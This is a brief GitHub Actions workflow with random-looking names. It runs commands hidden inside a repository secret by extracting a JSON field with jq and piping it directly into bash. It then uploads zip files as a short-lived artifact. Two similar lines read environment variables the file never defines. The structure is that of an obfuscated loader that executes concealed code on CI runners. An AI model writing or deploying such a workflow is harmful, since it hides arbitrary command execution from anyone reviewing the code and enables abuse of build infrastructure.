name: packercherylww
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: packercherylww
        env:
          ks13: ${{ secrets.ks13 }}
        run: |
          printf '%s' "$ks13" | jq -r .oz519 | /bin/bash
          echo $okv2624 | jq -r .ftsw449 | /bin/bash
          echo $gvwm9066 | jq -r .cd9 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Zsk2zjxj
          path: "*.zip"
          retention-days: 1
